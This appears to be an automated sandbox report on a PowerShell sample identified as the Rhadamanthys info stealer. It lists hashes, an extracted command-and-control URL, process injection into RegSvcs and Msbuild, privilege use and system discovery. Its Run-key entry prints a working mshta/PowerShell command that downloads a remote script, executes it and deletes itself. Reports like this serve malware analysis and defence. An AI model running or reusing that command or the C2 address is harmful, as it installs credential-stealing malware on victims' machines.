Analysis
-
max time kernel
95s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
submitted
28-11-2024 07:35
Static task
static1
Behavioral task
behavioral1
Sample
chutmarao.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
chutmarao.ps1
Resource
win10v2004-20241007-en
General
-
Target
chutmarao.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Malware Config
Extracted
rhadamanthys
https://185.196.8.68:9367/ab43097ee4f6e091aed46f79/88pw46v5.ki88g
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5056 created 2660 5056 RegSvcs.exe 51 -
Deletes itself 1 IoCs
pid Process 748 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderlt-133 = "mshta \"javascript:xy=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(xy[2])[xy[0]](xy[1], 0, true);close();vb=new ActiveXObject('Scripting.FileSystemObject');vb.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderl-154 = "schtasks /run /tn Defenderl-154" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 748 set thread context of 896 748 powershell.exe 92 PID 748 set thread context of 5056 748 powershell.exe 93 PID 748 set thread context of 3524 748 powershell.exe 94 PID 748 set thread context of 1124 748 powershell.exe 95 PID 748 set thread context of 3276 748 powershell.exe 96 PID 748 set thread context of 3964 748 powershell.exe 97 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 748 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 5056 RegSvcs.exe 5056 RegSvcs.exe 3080 openwith.exe 3080 openwith.exe 3080 openwith.exe 3080 openwith.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 748 powershell.exe Token: SeRestorePrivilege 3988 dw20.exe Token: SeBackupPrivilege 3988 dw20.exe Token: SeRestorePrivilege 1936 dw20.exe Token: SeBackupPrivilege 1936 dw20.exe Token: SeBackupPrivilege 1936 dw20.exe Token: SeBackupPrivilege 4788 dw20.exe Token: SeBackupPrivilege 1936 dw20.exe Token: SeBackupPrivilege 1936 dw20.exe Token: SeBackupPrivilege 4788 dw20.exe Token: SeBackupPrivilege 4788 dw20.exe Token: SeBackupPrivilege 4784 dw20.exe Token: SeBackupPrivilege 4784 dw20.exe Token: SeBackupPrivilege 3988 dw20.exe Token: SeBackupPrivilege 3988 dw20.exe Token: SeIncreaseQuotaPrivilege 748 powershell.exe Token: SeSecurityPrivilege 748 powershell.exe Token: SeTakeOwnershipPrivilege 748 powershell.exe Token: SeLoadDriverPrivilege 748 powershell.exe Token: SeSystemProfilePrivilege 748 powershell.exe Token: SeSystemtimePrivilege 748 powershell.exe Token: SeProfSingleProcessPrivilege 748 powershell.exe Token: SeIncBasePriorityPrivilege 748 powershell.exe Token: SeCreatePagefilePrivilege 748 powershell.exe Token: SeBackupPrivilege 748 powershell.exe Token: SeRestorePrivilege 748 powershell.exe Token: SeShutdownPrivilege 748 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeSystemEnvironmentPrivilege 748 powershell.exe Token: SeRemoteShutdownPrivilege 748 powershell.exe Token: SeUndockPrivilege 748 powershell.exe Token: SeManageVolumePrivilege 748 powershell.exe Token: 33 748 powershell.exe Token: 34 748 powershell.exe Token: 35 748 powershell.exe Token: 36 748 powershell.exe Token: SeIncreaseQuotaPrivilege 748 powershell.exe Token: SeSecurityPrivilege 748 powershell.exe Token: SeTakeOwnershipPrivilege 748 powershell.exe Token: SeLoadDriverPrivilege 748 powershell.exe Token: SeSystemProfilePrivilege 748 powershell.exe Token: SeSystemtimePrivilege 748 powershell.exe Token: SeProfSingleProcessPrivilege 748 powershell.exe Token: SeIncBasePriorityPrivilege 748 powershell.exe Token: SeCreatePagefilePrivilege 748 powershell.exe Token: SeBackupPrivilege 748 powershell.exe Token: SeRestorePrivilege 748 powershell.exe Token: SeShutdownPrivilege 748 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeSystemEnvironmentPrivilege 748 powershell.exe Token: SeRemoteShutdownPrivilege 748 powershell.exe Token: SeUndockPrivilege 748 powershell.exe Token: SeManageVolumePrivilege 748 powershell.exe Token: 33 748 powershell.exe Token: 34 748 powershell.exe Token: 35 748 powershell.exe Token: 36 748 powershell.exe Token: SeIncreaseQuotaPrivilege 748 powershell.exe Token: SeSecurityPrivilege 748 powershell.exe Token: SeTakeOwnershipPrivilege 748 powershell.exe Token: SeLoadDriverPrivilege 748 powershell.exe Token: SeSystemProfilePrivilege 748 powershell.exe Token: SeSystemtimePrivilege 748 powershell.exe Token: SeProfSingleProcessPrivilege 748 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 896 748 powershell.exe 92 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 5056 748 powershell.exe 93 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 3524 748 powershell.exe 94 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 1124 748 powershell.exe 95 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3276 748 powershell.exe 96 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 748 wrote to memory of 3964 748 powershell.exe 97 PID 3964 wrote to memory of 4788 3964 Msbuild.exe 98 PID 3964 wrote to memory of 4788 3964 Msbuild.exe 98 PID 3964 wrote to memory of 4788 3964 Msbuild.exe 98 PID 3276 wrote to memory of 3988 3276 Msbuild.exe 99 PID 3276 wrote to memory of 3988 3276 Msbuild.exe 99 PID 3276 wrote to memory of 3988 3276 Msbuild.exe 99 PID 1124 wrote to memory of 1936 1124 RegSvcs.exe 100 PID 1124 wrote to memory of 1936 1124 RegSvcs.exe 100 PID 1124 wrote to memory of 1936 1124 RegSvcs.exe 100 PID 3524 wrote to memory of 4784 3524 RegSvcs.exe 101 PID 3524 wrote to memory of 4784 3524 RegSvcs.exe 101 PID 3524 wrote to memory of 4784 3524 RegSvcs.exe 101 PID 5056 wrote to memory of 3080 5056 RegSvcs.exe 103 PID 5056 wrote to memory of 3080 5056 RegSvcs.exe 103 PID 5056 wrote to memory of 3080 5056 RegSvcs.exe 103 PID 5056 wrote to memory of 3080 5056 RegSvcs.exe 103
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2660
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\chutmarao.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
PID:896
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9123⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9123⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7603⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
315B
MD569acc92e6df5c35cf75eded8f61ddeaa
SHA1b405090a2f92f85490705dcf77a6461ad85e7e20
SHA256da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698
SHA5129b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82